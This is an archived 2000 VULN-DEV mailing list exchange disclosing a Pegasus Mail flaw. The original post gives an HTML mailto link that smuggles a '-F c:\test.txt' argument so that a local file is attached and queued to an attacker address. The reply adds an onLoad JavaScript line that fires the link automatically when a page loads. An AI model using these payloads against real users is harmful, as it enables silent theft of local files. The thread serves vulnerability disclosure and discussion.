kainEGOTRIP.DK

• Next message: Imran Ghory: "Pegasus mail file reading vulnerability"
• Previous message: H D Moore: "Re: Pegasus Mail"
• In reply to: Imran Ghory: "Pegasus Mail"
• Next in thread: Bernie Cosell: "Re: Pegasus Mail"
• Reply: Knud Erik Hojgaard - CyberCity Support: "Re: Pegasus Mail"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

very interesting as a little javascript can 'click' a link for you..

<BODY onLoad="location.href='mailto:hackerhakersite.com -F c:\test.txt';">

havent tested since i havent got pegasus mail, but it works for what i used
it for earlier('clicking' the its:its:its. link)

Med venlig hilsen

Knud Erik Hojgaard <knudcybercity.dk>
Cybercity Erhvervssupport <supporterhverv.cybercity.dk>
http://www.cybercity.dk/support

-----Original Message-----
From: VULN-DEV List [mailto:VULN-DEVSECURITYFOCUS.COM]On Behalf Of
Imran Ghory
Sent: 2. oktober 2000 23:45
To: VULN-DEVSECURITYFOCUS.COM
Subject: Pegasus Mail

When using the following html,

<a href="mailto:hackerhakersite.com -F c:\test.txt"> Click
here</a>

When the user clicks on "Click here" Pegasus mail will
automatically creates a message which has a copy of the file
"c:\test.txt" and is addressed to "hackerhakersite.com" and
queues it ready to be sent without any further user intervention.

If instead of "hackerhakersite.com" we have a local user,
"hacker" the message won't be queued but just sent immediately.

As inorder to have files stolen the user would have to click on the
dubious looking link, is this security risk serious ?

Imran Ghory

• Next message: Imran Ghory: "Pegasus mail file reading vulnerability"
• Previous message: H D Moore: "Re: Pegasus Mail"
• In reply to: Imran Ghory: "Pegasus Mail"
• Next in thread: Bernie Cosell: "Re: Pegasus Mail"
• Reply: Knud Erik Hojgaard - CyberCity Support: "Re: Pegasus Mail"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]